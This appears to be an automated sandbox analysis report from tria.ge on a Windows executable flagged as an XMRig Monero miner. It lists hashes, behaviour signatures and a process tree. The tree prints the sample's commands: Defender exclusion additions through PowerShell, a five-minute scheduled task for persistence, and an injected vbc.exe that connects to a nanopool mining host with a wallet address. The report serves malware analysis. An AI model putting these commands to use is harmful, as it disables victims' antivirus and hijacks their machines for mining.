Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
65s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
17/12/2022, 20:48
Static task
static1
General
-
Target
383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe
-
Size
2.0MB
-
MD5
7f6bd690058401943b45f8bc8667eec7
-
SHA1
f8f6f35ba3acdf7e37993b4116c6ef90ee163505
-
SHA256
383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9
-
SHA512
455ac13457f9417d2f4ece72cd1ba644ff80ccdbf4454b919d9689a4ae16456637bef963df8b131690ac9e4a0e3dfa1a866bdff29f65aaeebb36a1a413f8b402
-
SSDEEP
49152:2pFtPeFTefWNTt0dYMuZDGmA8M9JNYPGmT:2pWeulpZa/8+YPGU
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/4960-189-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4960-190-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/4960-191-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4960-192-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4960-194-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4960-199-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 1912 GAPOSUR.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation GAPOSUR.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1912 set thread context of 4960 1912 GAPOSUR.exe 102 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2588 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3372 timeout.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 372 383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe 372 383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe 4288 powershell.exe 4880 powershell.exe 4288 powershell.exe 4880 powershell.exe 1912 GAPOSUR.exe 1912 GAPOSUR.exe 1904 powershell.exe 3600 powershell.exe 3600 powershell.exe 1904 powershell.exe 1912 GAPOSUR.exe 1912 GAPOSUR.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 648 Process not Found -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 372 383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeDebugPrivilege 4880 powershell.exe Token: SeDebugPrivilege 1912 GAPOSUR.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeLockMemoryPrivilege 4960 vbc.exe Token: SeLockMemoryPrivilege 4960 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4960 vbc.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 372 wrote to memory of 4288 372 383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe 81 PID 372 wrote to memory of 4288 372 383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe 81 PID 372 wrote to memory of 4880 372 383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe 84 PID 372 wrote to memory of 4880 372 383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe 84 PID 372 wrote to memory of 4764 372 383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe 85 PID 372 wrote to memory of 4764 372 383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe 85 PID 4764 wrote to memory of 3372 4764 cmd.exe 87 PID 4764 wrote to memory of 3372 4764 cmd.exe 87 PID 4764 wrote to memory of 1912 4764 cmd.exe 91 PID 4764 wrote to memory of 1912 4764 cmd.exe 91 PID 1912 wrote to memory of 1904 1912 GAPOSUR.exe 92 PID 1912 wrote to memory of 1904 1912 GAPOSUR.exe 92 PID 1912 wrote to memory of 3600 1912 GAPOSUR.exe 94 PID 1912 wrote to memory of 3600 1912 GAPOSUR.exe 94 PID 1912 wrote to memory of 5012 1912 GAPOSUR.exe 96 PID 1912 wrote to memory of 5012 1912 GAPOSUR.exe 96 PID 5012 wrote to memory of 2588 5012 cmd.exe 98 PID 5012 wrote to memory of 2588 5012 cmd.exe 98 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102 PID 1912 wrote to memory of 4960 1912 GAPOSUR.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe"C:\Users\Admin\AppData\Local\Temp\383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp70FE.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:3372
-
-
C:\ProgramData\cloud\GAPOSUR.exe"C:\ProgramData\cloud\GAPOSUR.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GAPOSUR" /tr "C:\ProgramData\cloud\GAPOSUR.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GAPOSUR" /tr "C:\ProgramData\cloud\GAPOSUR.exe"5⤵
- Creates scheduled task(s)
PID:2588
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4960
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD57f6bd690058401943b45f8bc8667eec7
SHA1f8f6f35ba3acdf7e37993b4116c6ef90ee163505
SHA256383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9
SHA512455ac13457f9417d2f4ece72cd1ba644ff80ccdbf4454b919d9689a4ae16456637bef963df8b131690ac9e4a0e3dfa1a866bdff29f65aaeebb36a1a413f8b402
-
Filesize
2.0MB
MD57f6bd690058401943b45f8bc8667eec7
SHA1f8f6f35ba3acdf7e37993b4116c6ef90ee163505
SHA256383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9
SHA512455ac13457f9417d2f4ece72cd1ba644ff80ccdbf4454b919d9689a4ae16456637bef963df8b131690ac9e4a0e3dfa1a866bdff29f65aaeebb36a1a413f8b402
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD520eba6f91c7f44dc746743e4e69a4023
SHA1903369b2bdf3c8835dc9fb6b04e31f00e5f6a877
SHA2563a91331e9f82d5b7d6241cc4822658f7a3b583730308dacddad4b2acd5980120
SHA51237e59a1bce7013efd73e56d19a0b168d3d5f07d45ad3dfaf98c6be403ae4bdc8cf05b1b3f157b4e0217302b507dfdb757a1623d316a20a213cf5665f5cf7a87f
-
Filesize
944B
MD520eba6f91c7f44dc746743e4e69a4023
SHA1903369b2bdf3c8835dc9fb6b04e31f00e5f6a877
SHA2563a91331e9f82d5b7d6241cc4822658f7a3b583730308dacddad4b2acd5980120
SHA51237e59a1bce7013efd73e56d19a0b168d3d5f07d45ad3dfaf98c6be403ae4bdc8cf05b1b3f157b4e0217302b507dfdb757a1623d316a20a213cf5665f5cf7a87f
-
Filesize
944B
MD5cc19bcff372d20459d3651ba8aef50e7
SHA13c6f1d4cdd647864fb97a16b1aefba67fcee11f7
SHA256366473e774d8976c7fd4dc582220666fb61a4feb3f7c95e69b2a68ad9e446ec9
SHA512a0e360ca4b6e874fd44612bf4b17f3722c0619da4f6bade12a62efadae88c2d33460114eaafa2bc3fb1cef5bea07e745b8bee24f15d0cacaff5f4a521b225080
-
Filesize
141B
MD5fe55baad0b8ef6b1999cc76e11986eac
SHA13174960a35bdcf1de5617c6a9ed26008fa5f845d
SHA2564f844a56ed7b53a540310389d7c19004c321d059b29f41310a204c9c3fe7ae97
SHA512472ed9170989e6f3f661b0e9746999a660f87226b8bccd650c88a330818e5270951b1a936df841b46d4136dadc12b71d3c5dcbd3525271a208df9253eeeb6bd8